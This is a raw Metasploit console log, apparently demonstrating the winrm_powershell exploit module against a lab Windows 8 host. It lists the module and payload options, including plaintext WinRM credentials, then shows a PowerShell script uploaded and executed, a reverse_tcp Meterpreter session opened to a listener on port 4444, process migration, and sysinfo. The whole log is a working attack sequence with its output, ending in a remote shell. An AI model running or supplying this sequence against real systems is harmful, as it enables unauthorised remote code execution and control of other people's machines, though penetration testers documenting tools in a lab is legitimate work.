msf exploit(winrm_powershell) > show options

Module options (exploit/windows/winrm/winrm_powershell):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD  omfg             no        A specific password to authenticate with
   Proxies                    no        Use a proxy chain
   RHOST     10.6.255.158     yes       The target address
   RPORT     5985             yes       The target port
   URI       /wsman           yes       The URI of the WinRM service
   USERNAME  sinn3r           no        A specific username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     10.6.255.84      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(winrm_powershell) > rexploit
[*] Reloading module...
[*] Started reverse handler on 10.6.255.84:4444
[*] Attempting to set Execution Policy
[*] Grabbing %TEMP%
[*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
[*] Attempting to execute script...
[*] Sending stage (752128 bytes) to 10.6.255.158
[*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500

meterpreter >
[*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (2844)
[+] Migrating to 696
[+] Successfully migrated to process

meterpreter > sysinfo
Computer        : WIN-VFQHRRTCA39
OS              : Windows 8 (Build 9200).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >